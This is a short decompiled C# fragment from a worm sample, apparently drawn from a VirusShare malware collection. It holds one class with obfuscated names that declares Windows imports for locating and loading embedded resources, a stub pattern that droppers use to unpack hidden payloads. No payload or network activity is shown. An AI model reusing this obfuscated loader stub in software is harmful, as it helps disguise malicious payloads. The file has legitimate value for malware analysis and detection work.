// Decompiled with JetBrains decompiler // Type: G1iw5jvdvf5jyuwmtz03k02vp.Mvsaeg2eeoaqx3utk // Assembly: pff4wjti, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null // MVID: 5406B450-382A-49C3-BEAD-27BB328AB378 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Shakblades.ajg-9d1b9cde375114da6f4c66efbdae5f5f253766dca1651abfc7c38653f32c21ea.exe using System; using System.Runtime.InteropServices; namespace G1iw5jvdvf5jyuwmtz03k02vp { public class Mvsaeg2eeoaqx3utk { [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr cz23ictx0pf1xcpsqzxf3ue5fsjhmn3fi(string lpModuleName); [DllImport("kernel32.dll", EntryPoint = "FindResourceA")] public static extern IntPtr Nyja0dryfvflph11ok4ga5zpz( IntPtr hModule, int lpID, string lpType); [DllImport("kernel32.dll", EntryPoint = "LoadResource", SetLastError = true)] public static extern IntPtr Xpo3aq0mxqyvzr1zld5qguuzg(IntPtr hModule, IntPtr hResInfo); [DllImport("kernel32.dll", EntryPoint = "SizeofResource", SetLastError = true)] public static extern uint Wy3i4lea5jxu3fiu1mt0jbvl4gefufsn2(IntPtr hModule, IntPtr hResInfo); } }